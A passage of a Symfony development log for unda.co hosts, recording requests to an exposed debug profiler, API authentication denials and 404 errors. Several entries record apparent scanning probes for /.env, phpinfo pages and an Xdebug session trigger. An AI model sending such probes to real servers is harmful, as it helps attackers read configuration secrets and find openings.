  6791. [2025-12-20 10:26:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6792. [2025-12-20 10:26:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6793. [2025-12-20 10:30:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67","method":"GET"} []
  6794. [2025-12-20 10:30:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6795. [2025-12-20 10:30:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a","method":"GET"} []
  6796. [2025-12-20 10:30:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6797. [2025-12-20 10:34:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=form","method":"GET"} []
  6798. [2025-12-20 10:34:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  6799. [2025-12-20 10:35:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6800. [2025-12-20 10:35:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6801. [2025-12-20 10:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=config","method":"GET"} []
  6802. [2025-12-20 10:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6803. [2025-12-20 10:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=time","method":"GET"} []
  6804. [2025-12-20 10:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6805. [2025-12-20 10:45:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=logger","method":"GET"} []
  6806. [2025-12-20 10:45:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  6807. [2025-12-20 10:45:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6808. [2025-12-20 10:45:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6809. [2025-12-20 10:45:41] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"b839f8","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/b839f8","method":"GET"} []
  6810. [2025-12-20 10:52:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6811. [2025-12-20 10:53:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=security","method":"GET"} []
  6812. [2025-12-20 10:53:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6813. [2025-12-20 11:01:53] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  6814. [2025-12-20 11:03:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=validator","method":"GET"} []
  6815. [2025-12-20 11:03:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  6816. [2025-12-20 11:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=time","method":"GET"} []
  6817. [2025-12-20 11:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6818. [2025-12-20 11:05:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
  6819. [2025-12-20 11:06:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=config","method":"GET"} []
  6820. [2025-12-20 11:06:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6821. [2025-12-20 11:06:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6822. [2025-12-20 11:06:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6823. [2025-12-20 11:06:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6824. [2025-12-20 11:06:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6825. [2025-12-20 11:06:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6826. [2025-12-20 11:06:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6827. [2025-12-20 11:06:22] security.DEBUG: Calling Authentication entry point. [] []
  6828. [2025-12-20 11:06:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6829. [2025-12-20 11:06:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6830. [2025-12-20 11:06:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6831. [2025-12-20 11:06:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6832. [2025-12-20 11:06:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6833. [2025-12-20 11:06:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6834. [2025-12-20 11:06:24] security.DEBUG: Calling Authentication entry point. [] []
  6835. [2025-12-20 11:06:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6836. [2025-12-20 11:06:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6837. [2025-12-20 11:06:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6838. [2025-12-20 11:06:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6839. [2025-12-20 11:06:25] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6840. [2025-12-20 11:06:25] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6841. [2025-12-20 11:06:25] security.DEBUG: Calling Authentication entry point. [] []
  6842. [2025-12-20 11:06:28] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6843. [2025-12-20 11:06:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6844. [2025-12-20 11:06:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6845. [2025-12-20 11:06:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6846. [2025-12-20 11:06:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6847. [2025-12-20 11:06:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6848. [2025-12-20 11:06:28] security.DEBUG: Calling Authentication entry point. [] []
  6849. [2025-12-20 11:06:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6850. [2025-12-20 11:06:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6851. [2025-12-20 11:06:34] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6852. [2025-12-20 11:06:34] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6853. [2025-12-20 11:06:34] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6854. [2025-12-20 11:06:34] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6855. [2025-12-20 11:06:34] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6856. [2025-12-20 11:06:34] security.DEBUG: Calling Authentication entry point. [] []
  6857. [2025-12-20 11:06:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6858. [2025-12-20 11:06:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6859. [2025-12-20 11:06:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67","method":"GET"} []
  6860. [2025-12-20 11:06:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6861. [2025-12-20 11:06:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6862. [2025-12-20 11:06:48] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6863. [2025-12-20 11:06:48] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6864. [2025-12-20 11:06:48] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6865. [2025-12-20 11:06:48] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6866. [2025-12-20 11:06:48] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6867. [2025-12-20 11:06:48] security.DEBUG: Calling Authentication entry point. [] []
  6868. [2025-12-20 11:06:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6869. [2025-12-20 11:07:03] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6870. [2025-12-20 11:07:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6871. [2025-12-20 11:07:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6872. [2025-12-20 11:07:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6873. [2025-12-20 11:07:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6874. [2025-12-20 11:07:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6875. [2025-12-20 11:07:04] security.DEBUG: Calling Authentication entry point. [] []
  6876. [2025-12-20 11:07:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6877. [2025-12-20 11:07:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6878. [2025-12-20 11:07:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6879. [2025-12-20 11:07:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6880. [2025-12-20 11:07:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6881. [2025-12-20 11:07:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6882. [2025-12-20 11:07:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6883. [2025-12-20 11:07:19] security.DEBUG: Calling Authentication entry point. [] []
  6884. [2025-12-20 11:07:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6885. [2025-12-20 11:07:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=request","method":"GET"} []
  6886. [2025-12-20 11:07:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6887. [2025-12-20 11:08:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
  6888. [2025-12-20 11:08:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  6889. [2025-12-20 11:09:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4","method":"GET"} []
  6890. [2025-12-20 11:09:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6891. [2025-12-20 11:10:04] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f8d329","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f8d329/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
  6892. [2025-12-20 11:10:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
  6893. [2025-12-20 11:10:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6894. [2025-12-20 11:11:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6895. [2025-12-20 11:11:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  6896. [2025-12-20 11:13:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6897. [2025-12-20 11:13:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6898. [2025-12-20 11:13:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6899. [2025-12-20 11:13:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6900. [2025-12-20 11:13:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6901. [2025-12-20 11:13:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6902. [2025-12-20 11:13:14] security.DEBUG: Calling Authentication entry point. [] []
  6903. [2025-12-20 11:13:16] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6904. [2025-12-20 11:13:16] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6905. [2025-12-20 11:13:16] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6906. [2025-12-20 11:13:16] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6907. [2025-12-20 11:13:16] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6908. [2025-12-20 11:13:16] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6909. [2025-12-20 11:13:16] security.DEBUG: Calling Authentication entry point. [] []
  6910. [2025-12-20 11:13:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6911. [2025-12-20 11:13:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6912. [2025-12-20 11:13:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6913. [2025-12-20 11:13:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6914. [2025-12-20 11:13:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6915. [2025-12-20 11:13:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6916. [2025-12-20 11:13:20] security.DEBUG: Calling Authentication entry point. [] []
